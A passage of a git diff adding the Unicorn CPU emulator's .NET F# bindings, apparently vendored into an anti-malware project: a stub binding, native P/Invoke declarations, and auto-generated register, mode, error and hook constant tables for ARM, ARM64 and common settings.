0 + let mutable uc_open = fun(arch, mode, uc) -> 0 + let mutable close = fun(eng) -> 0 + let mutable mem_map = fun(eng, adress, size, perm) -> 0 + let mutable mem_map_ptr = fun(eng, address, size, perms, ptr) -> 0 + let mutable mem_unmap = fun(eng, address, size) -> 0 + let mutable mem_protect = fun(eng, address, size, perms) -> 0 + let mutable mem_write = fun(eng, adress, value, size) -> 0 + let mutable mem_read = fun(eng, adress, value, size) -> 0 + let mutable reg_write = fun(eng, regId, value) -> 0 + let mutable reg_read = fun(eng, regId, value) -> 0 + let mutable emu_start = fun(eng, beginAddr, untilAddr, timeout, count) -> 0 + let 
mutable emu_stop = fun(eng) -> 0 + let mutable hook_del = fun(eng, hook) -> 0 + let mutable arch_supported = fun(arch) -> true + let mutable errno = fun(eng) -> 0 + let mutable strerror = fun(err) -> new nativeint(0) + let mutable hook_add_noarg = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) -> 0 + let mutable hook_add_arg0 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) -> 0 + let mutable hook_add_arg0_arg1 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) -> 0 + + let instance = + {new IBinding with + member thi.Version(major, minor) = version(major, minor) + member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) + member thi.Close(eng) = close(eng) + member thi.MemMap(eng, adress, size, perm) = mem_map(eng, adress, size, perm) + member thi.MemWrite(eng, adress, value, size) = mem_write(eng, adress, value, size) + member thi.MemRead(eng, adress, value, size) = mem_read(eng, adress, value, size) + member thi.RegWrite(eng, regId, value) = reg_write(eng, regId, value) + member thi.RegRead(eng, regId, value) = reg_read(eng, regId, value) + member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = emu_start(eng, beginAddr, untilAddr, timeout, count) + member thi.EmuStop(eng) = emu_stop(eng) + member this.HookDel(eng, hook) = hook_del(eng, hook) + member thi.ArchSupported(arch) = arch_supported(arch) + member thi.Errono(eng) = errno(eng) + member thi.Strerror(err) = strerror(err) + member this.MemMapPtr(eng, address, size, perms, ptr) = mem_map_ptr(eng, address, size, perms, ptr) + member this.MemUnmap(eng, address, size) = mem_unmap(eng, address, size) + member this.MemProtect(eng, address, size, perms) = mem_protect(eng, address, size, perms) + member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) + member thi.HookAddArg0(eng, hh, callbackType, callback, userData, 
hookBegin, hookEnd, arg0) = hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) + member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) + } + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs new file mode 100644 index 0000000..6be7b2f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs @@ -0,0 +1,93 @@ +namespace UnicornManaged.Binding + +open System +open System.Runtime.InteropServices + +module NativeBinding = + + [] + module private Imported = + + [] + extern Int32 uc_version(UIntPtr major, UIntPtr minor) + + [] + extern Int32 uc_open(UInt32 arch, UInt32 mode, UIntPtr[] engine) + + [] + extern Int32 uc_close(UIntPtr eng) + + [] + extern Int32 uc_mem_map(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm) + + [] + extern Int32 uc_mem_map_ptr(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm, UIntPtr ptr) + + [] + extern Int32 uc_mem_unmap(UIntPtr eng, UInt64 address, UIntPtr size) + + [] + extern Int32 uc_mem_protect(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perms) + + [] + extern Int32 uc_mem_write(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) + + [] + extern Int32 uc_mem_read(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) + + [] + extern Int32 uc_reg_write(UIntPtr eng, Int32 regId, Byte[] value) + + [] + extern Int32 uc_reg_read(UIntPtr eng, Int32 regId, Byte[] value) + + [] + extern Int32 uc_emu_start(UIntPtr eng, UInt64 beginAddr, UInt64 untilAddr, UInt64 timeout, UInt64 count) + + [] + extern Int32 uc_emu_stop(UIntPtr eng) + + [] + extern Int32 uc_hook_del(UIntPtr eng, UIntPtr hook) + + [] + extern Boolean uc_arch_supported(Int32 
arch) + + [] + extern Int32 uc_errno(UIntPtr eng) + + [] + extern IntPtr uc_strerror(Int32 err) + + [] + extern Int32 uc_hook_add_noarg(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend) + + [] + extern Int32 uc_hook_add_arg0(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, Int32 arg0) + + [] + extern Int32 uc_hook_add_arg0_arg1(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, UInt64 arg0, UInt64 arg1) + + let instance = + {new IBinding with + member thi.Version(major, minor) = uc_version(major, minor) + member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) + member thi.Close(eng) = uc_close(eng) + member thi.MemMap(eng, adress, size, perm) = uc_mem_map(eng, adress, size, perm) + member thi.MemWrite(eng, adress, value, size) = uc_mem_write(eng, adress, value, size) + member thi.MemRead(eng, adress, value, size) = uc_mem_read(eng, adress, value, size) + member thi.RegWrite(eng, regId, value) = uc_reg_write(eng, regId, value) + member thi.RegRead(eng, regId, value) = uc_reg_read(eng, regId, value) + member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = uc_emu_start(eng, beginAddr, untilAddr, timeout, count) + member thi.EmuStop(eng) = uc_emu_stop(eng) + member this.HookDel(eng, hook) = uc_hook_del(eng, hook) + member thi.ArchSupported(arch) = uc_arch_supported(arch) + member thi.Errono(eng) = uc_errno(eng) + member thi.Strerror(err) = uc_strerror(err) + member this.MemMapPtr(eng, address, size, perms, ptr) = uc_mem_map_ptr(eng, address, size, perms, ptr) + member this.MemUnmap(eng, address, size) = uc_mem_unmap(eng, address, size) + member this.MemProtect(eng, address, size, perms) = uc_mem_protect(eng, address, size, perms) + member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = uc_hook_add_noarg(eng, hh, callbackType, 
callback, userData, hookBegin, hookEnd) + member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = uc_hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) + member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = uc_hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) + } \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs new file mode 100644 index 0000000..1751fc8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs @@ -0,0 +1,140 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Arm = + + // ARM registers + + let UC_ARM_REG_INVALID = 0 + let UC_ARM_REG_APSR = 1 + let UC_ARM_REG_APSR_NZCV = 2 + let UC_ARM_REG_CPSR = 3 + let UC_ARM_REG_FPEXC = 4 + let UC_ARM_REG_FPINST = 5 + let UC_ARM_REG_FPSCR = 6 + let UC_ARM_REG_FPSCR_NZCV = 7 + let UC_ARM_REG_FPSID = 8 + let UC_ARM_REG_ITSTATE = 9 + let UC_ARM_REG_LR = 10 + let UC_ARM_REG_PC = 11 + let UC_ARM_REG_SP = 12 + let UC_ARM_REG_SPSR = 13 + let UC_ARM_REG_D0 = 14 + let UC_ARM_REG_D1 = 15 + let UC_ARM_REG_D2 = 16 + let UC_ARM_REG_D3 = 17 + let UC_ARM_REG_D4 = 18 + let UC_ARM_REG_D5 = 19 + let UC_ARM_REG_D6 = 20 + let UC_ARM_REG_D7 = 21 + let UC_ARM_REG_D8 = 22 + let UC_ARM_REG_D9 = 23 + let UC_ARM_REG_D10 = 24 + let UC_ARM_REG_D11 = 25 + let UC_ARM_REG_D12 = 26 + let UC_ARM_REG_D13 = 27 + let UC_ARM_REG_D14 = 28 + let UC_ARM_REG_D15 = 29 + let UC_ARM_REG_D16 = 30 + let UC_ARM_REG_D17 = 31 + let UC_ARM_REG_D18 = 32 + let UC_ARM_REG_D19 = 33 + let UC_ARM_REG_D20 = 34 + let UC_ARM_REG_D21 = 35 + let UC_ARM_REG_D22 = 36 + let UC_ARM_REG_D23 = 37 + let UC_ARM_REG_D24 = 38 + let UC_ARM_REG_D25 = 
39 + let UC_ARM_REG_D26 = 40 + let UC_ARM_REG_D27 = 41 + let UC_ARM_REG_D28 = 42 + let UC_ARM_REG_D29 = 43 + let UC_ARM_REG_D30 = 44 + let UC_ARM_REG_D31 = 45 + let UC_ARM_REG_FPINST2 = 46 + let UC_ARM_REG_MVFR0 = 47 + let UC_ARM_REG_MVFR1 = 48 + let UC_ARM_REG_MVFR2 = 49 + let UC_ARM_REG_Q0 = 50 + let UC_ARM_REG_Q1 = 51 + let UC_ARM_REG_Q2 = 52 + let UC_ARM_REG_Q3 = 53 + let UC_ARM_REG_Q4 = 54 + let UC_ARM_REG_Q5 = 55 + let UC_ARM_REG_Q6 = 56 + let UC_ARM_REG_Q7 = 57 + let UC_ARM_REG_Q8 = 58 + let UC_ARM_REG_Q9 = 59 + let UC_ARM_REG_Q10 = 60 + let UC_ARM_REG_Q11 = 61 + let UC_ARM_REG_Q12 = 62 + let UC_ARM_REG_Q13 = 63 + let UC_ARM_REG_Q14 = 64 + let UC_ARM_REG_Q15 = 65 + let UC_ARM_REG_R0 = 66 + let UC_ARM_REG_R1 = 67 + let UC_ARM_REG_R2 = 68 + let UC_ARM_REG_R3 = 69 + let UC_ARM_REG_R4 = 70 + let UC_ARM_REG_R5 = 71 + let UC_ARM_REG_R6 = 72 + let UC_ARM_REG_R7 = 73 + let UC_ARM_REG_R8 = 74 + let UC_ARM_REG_R9 = 75 + let UC_ARM_REG_R10 = 76 + let UC_ARM_REG_R11 = 77 + let UC_ARM_REG_R12 = 78 + let UC_ARM_REG_S0 = 79 + let UC_ARM_REG_S1 = 80 + let UC_ARM_REG_S2 = 81 + let UC_ARM_REG_S3 = 82 + let UC_ARM_REG_S4 = 83 + let UC_ARM_REG_S5 = 84 + let UC_ARM_REG_S6 = 85 + let UC_ARM_REG_S7 = 86 + let UC_ARM_REG_S8 = 87 + let UC_ARM_REG_S9 = 88 + let UC_ARM_REG_S10 = 89 + let UC_ARM_REG_S11 = 90 + let UC_ARM_REG_S12 = 91 + let UC_ARM_REG_S13 = 92 + let UC_ARM_REG_S14 = 93 + let UC_ARM_REG_S15 = 94 + let UC_ARM_REG_S16 = 95 + let UC_ARM_REG_S17 = 96 + let UC_ARM_REG_S18 = 97 + let UC_ARM_REG_S19 = 98 + let UC_ARM_REG_S20 = 99 + let UC_ARM_REG_S21 = 100 + let UC_ARM_REG_S22 = 101 + let UC_ARM_REG_S23 = 102 + let UC_ARM_REG_S24 = 103 + let UC_ARM_REG_S25 = 104 + let UC_ARM_REG_S26 = 105 + let UC_ARM_REG_S27 = 106 + let UC_ARM_REG_S28 = 107 + let UC_ARM_REG_S29 = 108 + let UC_ARM_REG_S30 = 109 + let UC_ARM_REG_S31 = 110 + let UC_ARM_REG_C1_C0_2 = 111 + let UC_ARM_REG_C13_C0_2 = 112 + let UC_ARM_REG_C13_C0_3 = 113 + let UC_ARM_REG_IPSR = 114 + let UC_ARM_REG_MSP = 115 + let 
UC_ARM_REG_PSP = 116 + let UC_ARM_REG_CONTROL = 117 + let UC_ARM_REG_ENDING = 118 + + // alias registers + let UC_ARM_REG_R13 = 12 + let UC_ARM_REG_R14 = 10 + let UC_ARM_REG_R15 = 11 + let UC_ARM_REG_SB = 75 + let UC_ARM_REG_SL = 76 + let UC_ARM_REG_FP = 77 + let UC_ARM_REG_IP = 78 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs new file mode 100644 index 0000000..a2ec894 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs @@ -0,0 +1,319 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Arm64 = + + // ARM64 registers + + let UC_ARM64_REG_INVALID = 0 + let UC_ARM64_REG_X29 = 1 + let UC_ARM64_REG_X30 = 2 + let UC_ARM64_REG_NZCV = 3 + let UC_ARM64_REG_SP = 4 + let UC_ARM64_REG_WSP = 5 + let UC_ARM64_REG_WZR = 6 + let UC_ARM64_REG_XZR = 7 + let UC_ARM64_REG_B0 = 8 + let UC_ARM64_REG_B1 = 9 + let UC_ARM64_REG_B2 = 10 + let UC_ARM64_REG_B3 = 11 + let UC_ARM64_REG_B4 = 12 + let UC_ARM64_REG_B5 = 13 + let UC_ARM64_REG_B6 = 14 + let UC_ARM64_REG_B7 = 15 + let UC_ARM64_REG_B8 = 16 + let UC_ARM64_REG_B9 = 17 + let UC_ARM64_REG_B10 = 18 + let UC_ARM64_REG_B11 = 19 + let UC_ARM64_REG_B12 = 20 + let UC_ARM64_REG_B13 = 21 + let UC_ARM64_REG_B14 = 22 + let UC_ARM64_REG_B15 = 23 + let UC_ARM64_REG_B16 = 24 + let UC_ARM64_REG_B17 = 25 + let UC_ARM64_REG_B18 = 26 + let UC_ARM64_REG_B19 = 27 + let UC_ARM64_REG_B20 = 28 + let UC_ARM64_REG_B21 = 29 + let UC_ARM64_REG_B22 = 30 + let UC_ARM64_REG_B23 = 31 + let UC_ARM64_REG_B24 = 32 + let UC_ARM64_REG_B25 = 33 + let UC_ARM64_REG_B26 = 34 + let UC_ARM64_REG_B27 = 35 + let UC_ARM64_REG_B28 = 36 + let UC_ARM64_REG_B29 = 37 + let UC_ARM64_REG_B30 = 38 + let UC_ARM64_REG_B31 = 39 + let UC_ARM64_REG_D0 = 40 + let UC_ARM64_REG_D1 = 41 + let UC_ARM64_REG_D2 = 42 + let UC_ARM64_REG_D3 = 
43 + let UC_ARM64_REG_D4 = 44 + let UC_ARM64_REG_D5 = 45 + let UC_ARM64_REG_D6 = 46 + let UC_ARM64_REG_D7 = 47 + let UC_ARM64_REG_D8 = 48 + let UC_ARM64_REG_D9 = 49 + let UC_ARM64_REG_D10 = 50 + let UC_ARM64_REG_D11 = 51 + let UC_ARM64_REG_D12 = 52 + let UC_ARM64_REG_D13 = 53 + let UC_ARM64_REG_D14 = 54 + let UC_ARM64_REG_D15 = 55 + let UC_ARM64_REG_D16 = 56 + let UC_ARM64_REG_D17 = 57 + let UC_ARM64_REG_D18 = 58 + let UC_ARM64_REG_D19 = 59 + let UC_ARM64_REG_D20 = 60 + let UC_ARM64_REG_D21 = 61 + let UC_ARM64_REG_D22 = 62 + let UC_ARM64_REG_D23 = 63 + let UC_ARM64_REG_D24 = 64 + let UC_ARM64_REG_D25 = 65 + let UC_ARM64_REG_D26 = 66 + let UC_ARM64_REG_D27 = 67 + let UC_ARM64_REG_D28 = 68 + let UC_ARM64_REG_D29 = 69 + let UC_ARM64_REG_D30 = 70 + let UC_ARM64_REG_D31 = 71 + let UC_ARM64_REG_H0 = 72 + let UC_ARM64_REG_H1 = 73 + let UC_ARM64_REG_H2 = 74 + let UC_ARM64_REG_H3 = 75 + let UC_ARM64_REG_H4 = 76 + let UC_ARM64_REG_H5 = 77 + let UC_ARM64_REG_H6 = 78 + let UC_ARM64_REG_H7 = 79 + let UC_ARM64_REG_H8 = 80 + let UC_ARM64_REG_H9 = 81 + let UC_ARM64_REG_H10 = 82 + let UC_ARM64_REG_H11 = 83 + let UC_ARM64_REG_H12 = 84 + let UC_ARM64_REG_H13 = 85 + let UC_ARM64_REG_H14 = 86 + let UC_ARM64_REG_H15 = 87 + let UC_ARM64_REG_H16 = 88 + let UC_ARM64_REG_H17 = 89 + let UC_ARM64_REG_H18 = 90 + let UC_ARM64_REG_H19 = 91 + let UC_ARM64_REG_H20 = 92 + let UC_ARM64_REG_H21 = 93 + let UC_ARM64_REG_H22 = 94 + let UC_ARM64_REG_H23 = 95 + let UC_ARM64_REG_H24 = 96 + let UC_ARM64_REG_H25 = 97 + let UC_ARM64_REG_H26 = 98 + let UC_ARM64_REG_H27 = 99 + let UC_ARM64_REG_H28 = 100 + let UC_ARM64_REG_H29 = 101 + let UC_ARM64_REG_H30 = 102 + let UC_ARM64_REG_H31 = 103 + let UC_ARM64_REG_Q0 = 104 + let UC_ARM64_REG_Q1 = 105 + let UC_ARM64_REG_Q2 = 106 + let UC_ARM64_REG_Q3 = 107 + let UC_ARM64_REG_Q4 = 108 + let UC_ARM64_REG_Q5 = 109 + let UC_ARM64_REG_Q6 = 110 + let UC_ARM64_REG_Q7 = 111 + let UC_ARM64_REG_Q8 = 112 + let UC_ARM64_REG_Q9 = 113 + let UC_ARM64_REG_Q10 = 114 + let 
UC_ARM64_REG_Q11 = 115 + let UC_ARM64_REG_Q12 = 116 + let UC_ARM64_REG_Q13 = 117 + let UC_ARM64_REG_Q14 = 118 + let UC_ARM64_REG_Q15 = 119 + let UC_ARM64_REG_Q16 = 120 + let UC_ARM64_REG_Q17 = 121 + let UC_ARM64_REG_Q18 = 122 + let UC_ARM64_REG_Q19 = 123 + let UC_ARM64_REG_Q20 = 124 + let UC_ARM64_REG_Q21 = 125 + let UC_ARM64_REG_Q22 = 126 + let UC_ARM64_REG_Q23 = 127 + let UC_ARM64_REG_Q24 = 128 + let UC_ARM64_REG_Q25 = 129 + let UC_ARM64_REG_Q26 = 130 + let UC_ARM64_REG_Q27 = 131 + let UC_ARM64_REG_Q28 = 132 + let UC_ARM64_REG_Q29 = 133 + let UC_ARM64_REG_Q30 = 134 + let UC_ARM64_REG_Q31 = 135 + let UC_ARM64_REG_S0 = 136 + let UC_ARM64_REG_S1 = 137 + let UC_ARM64_REG_S2 = 138 + let UC_ARM64_REG_S3 = 139 + let UC_ARM64_REG_S4 = 140 + let UC_ARM64_REG_S5 = 141 + let UC_ARM64_REG_S6 = 142 + let UC_ARM64_REG_S7 = 143 + let UC_ARM64_REG_S8 = 144 + let UC_ARM64_REG_S9 = 145 + let UC_ARM64_REG_S10 = 146 + let UC_ARM64_REG_S11 = 147 + let UC_ARM64_REG_S12 = 148 + let UC_ARM64_REG_S13 = 149 + let UC_ARM64_REG_S14 = 150 + let UC_ARM64_REG_S15 = 151 + let UC_ARM64_REG_S16 = 152 + let UC_ARM64_REG_S17 = 153 + let UC_ARM64_REG_S18 = 154 + let UC_ARM64_REG_S19 = 155 + let UC_ARM64_REG_S20 = 156 + let UC_ARM64_REG_S21 = 157 + let UC_ARM64_REG_S22 = 158 + let UC_ARM64_REG_S23 = 159 + let UC_ARM64_REG_S24 = 160 + let UC_ARM64_REG_S25 = 161 + let UC_ARM64_REG_S26 = 162 + let UC_ARM64_REG_S27 = 163 + let UC_ARM64_REG_S28 = 164 + let UC_ARM64_REG_S29 = 165 + let UC_ARM64_REG_S30 = 166 + let UC_ARM64_REG_S31 = 167 + let UC_ARM64_REG_W0 = 168 + let UC_ARM64_REG_W1 = 169 + let UC_ARM64_REG_W2 = 170 + let UC_ARM64_REG_W3 = 171 + let UC_ARM64_REG_W4 = 172 + let UC_ARM64_REG_W5 = 173 + let UC_ARM64_REG_W6 = 174 + let UC_ARM64_REG_W7 = 175 + let UC_ARM64_REG_W8 = 176 + let UC_ARM64_REG_W9 = 177 + let UC_ARM64_REG_W10 = 178 + let UC_ARM64_REG_W11 = 179 + let UC_ARM64_REG_W12 = 180 + let UC_ARM64_REG_W13 = 181 + let UC_ARM64_REG_W14 = 182 + let UC_ARM64_REG_W15 = 183 + let UC_ARM64_REG_W16 = 
184 + let UC_ARM64_REG_W17 = 185 + let UC_ARM64_REG_W18 = 186 + let UC_ARM64_REG_W19 = 187 + let UC_ARM64_REG_W20 = 188 + let UC_ARM64_REG_W21 = 189 + let UC_ARM64_REG_W22 = 190 + let UC_ARM64_REG_W23 = 191 + let UC_ARM64_REG_W24 = 192 + let UC_ARM64_REG_W25 = 193 + let UC_ARM64_REG_W26 = 194 + let UC_ARM64_REG_W27 = 195 + let UC_ARM64_REG_W28 = 196 + let UC_ARM64_REG_W29 = 197 + let UC_ARM64_REG_W30 = 198 + let UC_ARM64_REG_X0 = 199 + let UC_ARM64_REG_X1 = 200 + let UC_ARM64_REG_X2 = 201 + let UC_ARM64_REG_X3 = 202 + let UC_ARM64_REG_X4 = 203 + let UC_ARM64_REG_X5 = 204 + let UC_ARM64_REG_X6 = 205 + let UC_ARM64_REG_X7 = 206 + let UC_ARM64_REG_X8 = 207 + let UC_ARM64_REG_X9 = 208 + let UC_ARM64_REG_X10 = 209 + let UC_ARM64_REG_X11 = 210 + let UC_ARM64_REG_X12 = 211 + let UC_ARM64_REG_X13 = 212 + let UC_ARM64_REG_X14 = 213 + let UC_ARM64_REG_X15 = 214 + let UC_ARM64_REG_X16 = 215 + let UC_ARM64_REG_X17 = 216 + let UC_ARM64_REG_X18 = 217 + let UC_ARM64_REG_X19 = 218 + let UC_ARM64_REG_X20 = 219 + let UC_ARM64_REG_X21 = 220 + let UC_ARM64_REG_X22 = 221 + let UC_ARM64_REG_X23 = 222 + let UC_ARM64_REG_X24 = 223 + let UC_ARM64_REG_X25 = 224 + let UC_ARM64_REG_X26 = 225 + let UC_ARM64_REG_X27 = 226 + let UC_ARM64_REG_X28 = 227 + let UC_ARM64_REG_V0 = 228 + let UC_ARM64_REG_V1 = 229 + let UC_ARM64_REG_V2 = 230 + let UC_ARM64_REG_V3 = 231 + let UC_ARM64_REG_V4 = 232 + let UC_ARM64_REG_V5 = 233 + let UC_ARM64_REG_V6 = 234 + let UC_ARM64_REG_V7 = 235 + let UC_ARM64_REG_V8 = 236 + let UC_ARM64_REG_V9 = 237 + let UC_ARM64_REG_V10 = 238 + let UC_ARM64_REG_V11 = 239 + let UC_ARM64_REG_V12 = 240 + let UC_ARM64_REG_V13 = 241 + let UC_ARM64_REG_V14 = 242 + let UC_ARM64_REG_V15 = 243 + let UC_ARM64_REG_V16 = 244 + let UC_ARM64_REG_V17 = 245 + let UC_ARM64_REG_V18 = 246 + let UC_ARM64_REG_V19 = 247 + let UC_ARM64_REG_V20 = 248 + let UC_ARM64_REG_V21 = 249 + let UC_ARM64_REG_V22 = 250 + let UC_ARM64_REG_V23 = 251 + let UC_ARM64_REG_V24 = 252 + let UC_ARM64_REG_V25 = 253 + let 
UC_ARM64_REG_V26 = 254 + let UC_ARM64_REG_V27 = 255 + let UC_ARM64_REG_V28 = 256 + let UC_ARM64_REG_V29 = 257 + let UC_ARM64_REG_V30 = 258 + let UC_ARM64_REG_V31 = 259 + + // pseudo registers + let UC_ARM64_REG_PC = 260 + let UC_ARM64_REG_CPACR_EL1 = 261 + + // thread registers + let UC_ARM64_REG_TPIDR_EL0 = 262 + let UC_ARM64_REG_TPIDRRO_EL0 = 263 + let UC_ARM64_REG_TPIDR_EL1 = 264 + let UC_ARM64_REG_PSTATE = 265 + + // exception link registers + let UC_ARM64_REG_ELR_EL0 = 266 + let UC_ARM64_REG_ELR_EL1 = 267 + let UC_ARM64_REG_ELR_EL2 = 268 + let UC_ARM64_REG_ELR_EL3 = 269 + + // stack pointers registers + let UC_ARM64_REG_SP_EL0 = 270 + let UC_ARM64_REG_SP_EL1 = 271 + let UC_ARM64_REG_SP_EL2 = 272 + let UC_ARM64_REG_SP_EL3 = 273 + + // other CP15 registers + let UC_ARM64_REG_TTBR0_EL1 = 274 + let UC_ARM64_REG_TTBR1_EL1 = 275 + let UC_ARM64_REG_ESR_EL0 = 276 + let UC_ARM64_REG_ESR_EL1 = 277 + let UC_ARM64_REG_ESR_EL2 = 278 + let UC_ARM64_REG_ESR_EL3 = 279 + let UC_ARM64_REG_FAR_EL0 = 280 + let UC_ARM64_REG_FAR_EL1 = 281 + let UC_ARM64_REG_FAR_EL2 = 282 + let UC_ARM64_REG_FAR_EL3 = 283 + let UC_ARM64_REG_PAR_EL1 = 284 + let UC_ARM64_REG_MAIR_EL1 = 285 + let UC_ARM64_REG_VBAR_EL0 = 286 + let UC_ARM64_REG_VBAR_EL1 = 287 + let UC_ARM64_REG_VBAR_EL2 = 288 + let UC_ARM64_REG_VBAR_EL3 = 289 + let UC_ARM64_REG_ENDING = 290 + + // alias registers + let UC_ARM64_REG_IP0 = 215 + let UC_ARM64_REG_IP1 = 216 + let UC_ARM64_REG_FP = 1 + let UC_ARM64_REG_LR = 2 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs new file mode 100644 index 0000000..c80ded8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs @@ -0,0 +1,116 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Common = + let UC_API_MAJOR = 1 + + let UC_API_MINOR = 0 + let UC_VERSION_MAJOR = 1 + + let UC_VERSION_MINOR = 0 + let UC_VERSION_EXTRA = 2 + let UC_SECOND_SCALE = 1000000 + let UC_MILISECOND_SCALE = 1000 + let UC_ARCH_ARM = 1 + let UC_ARCH_ARM64 = 2 + let UC_ARCH_MIPS = 3 + let UC_ARCH_X86 = 4 + let UC_ARCH_PPC = 5 + let UC_ARCH_SPARC = 6 + let UC_ARCH_M68K = 7 + let UC_ARCH_MAX = 8 + + let UC_MODE_LITTLE_ENDIAN = 0 + let UC_MODE_BIG_ENDIAN = 1073741824 + + let UC_MODE_ARM = 0 + let UC_MODE_THUMB = 16 + let UC_MODE_MCLASS = 32 + let UC_MODE_V8 = 64 + let UC_MODE_ARM926 = 128 + let UC_MODE_ARM946 = 256 + let UC_MODE_ARM1176 = 512 + let UC_MODE_MICRO = 16 + let UC_MODE_MIPS3 = 32 + let UC_MODE_MIPS32R6 = 64 + let UC_MODE_MIPS32 = 4 + let UC_MODE_MIPS64 = 8 + let UC_MODE_16 = 2 + let UC_MODE_32 = 4 + let UC_MODE_64 = 8 + let UC_MODE_PPC32 = 4 + let UC_MODE_PPC64 = 8 + let UC_MODE_QPX = 16 + let UC_MODE_SPARC32 = 4 + let UC_MODE_SPARC64 = 8 + let UC_MODE_V9 = 16 + + let UC_ERR_OK = 0 + let UC_ERR_NOMEM = 1 + let UC_ERR_ARCH = 2 + let UC_ERR_HANDLE = 3 + let UC_ERR_MODE = 4 + let UC_ERR_VERSION = 5 + let UC_ERR_READ_UNMAPPED = 6 + let UC_ERR_WRITE_UNMAPPED = 7 + let UC_ERR_FETCH_UNMAPPED = 8 + let UC_ERR_HOOK = 9 + let UC_ERR_INSN_INVALID = 10 + let UC_ERR_MAP = 11 + let UC_ERR_WRITE_PROT = 12 + let UC_ERR_READ_PROT = 13 + let UC_ERR_FETCH_PROT = 14 + let UC_ERR_ARG = 15 + let UC_ERR_READ_UNALIGNED = 16 + let UC_ERR_WRITE_UNALIGNED = 17 + let UC_ERR_FETCH_UNALIGNED = 18 + let UC_ERR_HOOK_EXIST = 19 + let UC_ERR_RESOURCE = 20 + let UC_ERR_EXCEPTION = 21 + let UC_MEM_READ = 16 + let UC_MEM_WRITE = 17 + let UC_MEM_FETCH = 18 + let UC_MEM_READ_UNMAPPED = 19 + let UC_MEM_WRITE_UNMAPPED = 20 + let UC_MEM_FETCH_UNMAPPED = 21 + let UC_MEM_WRITE_PROT = 22 + let UC_MEM_READ_PROT = 23 + let UC_MEM_FETCH_PROT = 24 + let UC_MEM_READ_AFTER = 25 + let UC_HOOK_INTR = 1 + let UC_HOOK_INSN = 
2 + let UC_HOOK_CODE = 4 + let UC_HOOK_BLOCK = 8 + let UC_HOOK_MEM_READ_UNMAPPED = 16 + let UC_HOOK_MEM_WRITE_UNMAPPED = 32 + let UC_HOOK_MEM_FETCH_UNMAPPED = 64 + let UC_HOOK_MEM_READ_PROT = 128 + let UC_HOOK_MEM_WRITE_PROT = 256 + let UC_HOOK_MEM_FETCH_PROT = 512 + let UC_HOOK_MEM_READ = 1024 + let UC_HOOK_MEM_WRITE = 2048 + let UC_HOOK_MEM_FETCH = 4096 + let UC_HOOK_MEM_READ_AFTER = 8192 + let UC_HOOK_INSN_INVALID = 16384 + let UC_HOOK_MEM_UNMAPPED = 112 + let UC_HOOK_MEM_PROT = 896 + let UC_HOOK_MEM_READ_INVALID = 144 + let UC_HOOK_MEM_WRITE_INVALID = 288 + let UC_HOOK_MEM_FETCH_INVALID = 576 + let UC_HOOK_MEM_INVALID = 1008 + let UC_HOOK_MEM_VALID = 7168 + let UC_QUERY_MODE = 1 + let UC_QUERY_PAGE_SIZE = 2 + let UC_QUERY_ARCH = 3 + let UC_QUERY_TIMEOUT = 4 + + let UC_PROT_NONE = 0 + let UC_PROT_READ = 1 + let 